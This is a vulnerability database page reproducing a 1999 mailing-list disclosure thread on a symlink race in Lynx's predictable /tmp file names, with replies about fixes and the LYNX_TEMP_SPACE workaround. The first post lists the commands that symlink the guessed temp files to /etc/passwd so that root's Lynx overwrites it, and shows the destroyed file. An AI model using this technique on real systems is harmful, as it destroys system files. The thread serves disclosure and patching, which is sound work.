Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

lynxtmp.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Lynx creates temporary files in /tmp, which can be exploited via symlinks to overwrite files.

Code
`Date: Tue, 9 Feb 1999 20:57:30 -0500  
From: Juan Diego Bolanos <[email protected]>  
To: [email protected]  
Subject: Lynx /tmp problem  
  
Hi Aleph,  
please filter this if already posted....  
------  
  
Hello....  
  
I have found a bug in Lynx all versions, except the latest stable  
release...  
  
lynx create temporary files in /tmp in this way....  
  
  
L[num proc]-xTMP.html  
  
where  
  
[num proc] is the proc number in the machine  
x is a number from 0 to 9  
  
if i run lynx like any user, for example root we see this  
  
earthworm:~$ ps  
PID TTY STAT TIME COMMAND  
91 1 SW 0:06 (bash)  
94 4 S 0:05 -bash  
95 5 SW 0:06 (bash)  
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:  
3870 3 SW 0:02 (ssh)  
3894 4 T 0:00 lynx  
3898 4 R 0:00 ps  
  
then the files in /tmp created by lynx will be..  
  
L3894-0TMP.html  
L3894-1TMP.html  
L3894-2TMP.html  
L3894-3TMP.html  
L3894-4TMP.html  
L3894-5TMP.html  
L3894-6TMP.html  
L3894-7TMP.html  
L3894-8TMP.html  
L3894-9TMP.html  
  
if i make a symlink  
>from all of this files to any file in the system, for example....  
  
  
earthworm:~$ cd /tmp  
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html  
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html  
  
and now root (in this example) try to download a file, or press the  
backspace key to reach the history list, the file i have linked (in this  
case /etc/passwd) will be replaced with it... and now is owned by root...  
  
for example i got this in my system...  
  
earthworm:/tmp$ cat /etc/passwd  
  
<head>  
<title>Lynx History Page</title>  
</head>  
<body>  
<h1>You have reached the History Page</h1>  
<h2>Lynx Version 2.8rel2</h2>  
<pre><em>You selected:</em>  
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>  
<tab to=t0>file://localhost/root/firefaq.html  
</pre>  
</body>  
  
  
like you see, the file is lost now...  
  
this bug is lynx specific, so all OS are vulnerables..  
  
Fix, upgrade to the latest lynx version, i have checked it, and it appear  
to use a L[proc num]-xTMP.html where x is from 0 to ???...  
  
i hope it is already fixed, creating 100 symlinks are not to hard :)  
  
the lynx team know this yet.  
  
by...  
  
  
Juan Diego  
  
---------------------------------------------------------------------------  
  
Date: Thu, 11 Feb 1999 12:55:41 -0700  
From: Theo de Raadt <[email protected]>  
To: [email protected]  
Subject: Re: Lynx /tmp problem  
  
> this bug is lynx specific, so all OS are vulnerables..  
  
OpenBSD ships with an integrated version of lynx. Our version has  
tweaks to avoid this issue.  
  
We've brought this issue up with the lynx people before. They do not  
appear to give a damn.  
  
That said, from reading the code I can see why they might not care --  
this problem is going to be a complete nightmare to fix. Lynx's  
handling of /tmp is wrought with many races, and the code is pasta.  
  
---------------------------------------------------------------------------  
  
Date: Fri, 12 Feb 1999 08:47:00 +0000  
From: Glynn Clements <[email protected]>  
To: [email protected]  
Subject: Re: Lynx /tmp problem  
  
Juan Diego Bolanos wrote:  
  
> Hi Aleph,  
> please filter this if already posted....  
  
The fact that lynx has potential /tmp problems was discussed last  
March:  
  
From: Michal Zalewski <[email protected]>  
Subject: Another day, another race - lynx 2.7.1  
Date: Tue, 17 Mar 1998 15:39:58 +0100  
Message-ID: <Pine.LNX.3.96.980317152338.14878A-100000@genome>  
  
> I have found a bug in Lynx all versions, except the latest stable  
> release...  
>  
> lynx create temporary files in /tmp in this way....  
  
[details of your average /tmp problem snipped].  
  
>From the INSTALLATION file:  
  
The environment variable "LYNX_TEMP_SPACE", if set, will override the  
default path prefix for temporary files that was defined via the constant  
"TEMP_SPACE" in userdefs.h. See userdefs.h for more information.  
  
--  
Glynn Clements <[email protected]>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
lynx vulnerabilitytemporary filessymlink exploitationfile overwriteinformation security.
27